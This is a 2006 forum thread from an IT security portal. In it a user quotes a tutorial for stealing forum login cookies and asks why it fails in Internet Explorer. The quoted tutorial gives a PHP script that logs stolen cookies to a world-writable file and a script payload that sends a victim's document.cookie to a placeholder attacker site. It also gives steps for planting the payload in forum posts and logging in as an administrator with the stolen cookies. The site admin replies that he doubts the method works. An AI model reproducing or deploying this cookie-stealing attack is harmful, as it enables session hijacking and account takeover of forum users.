Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 29, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 876
Members: 0
Total: 876
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> Cookie stealer only works in Firefox not IE 6 or 7
Post new topic  Reply to topic View previous topic :: View next topic 
Cookie stealer only works in Firefox not IE 6 or 7
PostPosted: Sun Dec 24, 2006 11:35 am Reply with quote
ketchup
Regular user
Regular user
 
Joined: May 16, 2006
Posts: 23
Location: no




Cookie stealer only works in Firefox not IE 6 or 7

Is the problem the <script></script> part?

I used this:

(I didnt use a .gif file but a .html file)

http://forum.milw0rm.com/showthread.php?t=4621

for people who havent register at milw0rm yet:

Quote:
DaNg3R_Rul3z DaNg3R_Rul3z is online now
Junior Member

Join Date: Dec 2006
Posts: 13
Smile Steal Forum Cookies With Gif
How To Steal Cookies From A Forum With A Gif And Login With Admin Privileges Without Hash Cracking !
Use Firefox Because It's The Best Browser On The Web
U Can Download The ADD N EDIT COOKIE HACK HERE:
Code:

https://addons.mozilla.org/firefox/573/

Tested On Invision Power Board 2.1.7 <- And This Xploit Works On Much Boards !

Ok Lets Start Now

Here Is Some Files U Need...

1. ) -> Copy the below code,paste in notepad or ur fav text editor and save as cookiestealer.php (Note : Save it as cookiestealer.php not cookiestealer.php.txt)

cookiestealer.php
Code:

<?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo ".";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo ".";
exit;
}
}
echo ".";
fclose($handle);
exit;
}
echo ".";
exit;
?>

2. ) Make a new text file and name it logfile.txt and chmod it 777 .

3. ) The malicious file fun.gif (It will redirect user to cookie stealer) .. Copy the below code and save it as fun.gif

Code:

<SCRIPT>location.href='http://yoursite.com/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>

4. ) And a real image miniature (to show to the victim)

Ok now we have 4 files as listed below :

1. ) cookiestealer.php
2. ) logfile.txt
3. ) fun.gif
4. ) And a real image (any)

lets start now ..

Upload these files to your webspace example :

fun.gif (ftp) -> www.yoursite.com/fun.gif
cookiestealer.php (ftp) -> www.yoursite.com/cookiestealer.php
logfile.txt (ftp) -> www.yoursite.com/logfile.txt


ok now go on the victim forum .. Suppose victim forum is www.victim.com/forum/index.php

Post a new topic or reply or we can insert the malicious gif in the signature ... or where we can .. but now i do
a new topic with this bbcode :
PHP Code:

with this bbcode the victim don't see the fun.gif but the real image miniature and when he click on it ,he has a redirect
to the cookiestealer ... and we can see his cookies on :

http://yoursite.com/logfile.txt

when we have cookies we go to firefox and with the addon add n edit cookies i login with admin privileges... (first login with any user then edit cookies)

Now reload the page and you will logged in like the administrator


Enj0y.


pls help me

greetz Ketchup
View user's profile Send private message
PostPosted: Sun Dec 24, 2006 2:40 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




By the way, I don't believe, that this is an working exploit. This seems to be some sort of fake to me Sad
First of all, there are problems in IE and ONLY in IE, related to image parsing and possible script execution. And in that case attacker must be able to upload some jpg/gif picture to victim server and then IF victim opens that malicious picture (cut/paste pic address to IE url bar), THEN javascript can steal cookies.
But in this case, you described, picture is located outside of victim server/domain. So IF you can get cookies, then you will get cookies, related to YOURSITE.COM domain Smile
Or maybe there is something i miss Confused
Probably not Wink
View user's profile Send private message Send e-mail Visit poster's website
Cookie stealer only works in Firefox not IE 6 or 7
  www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.140 Seconds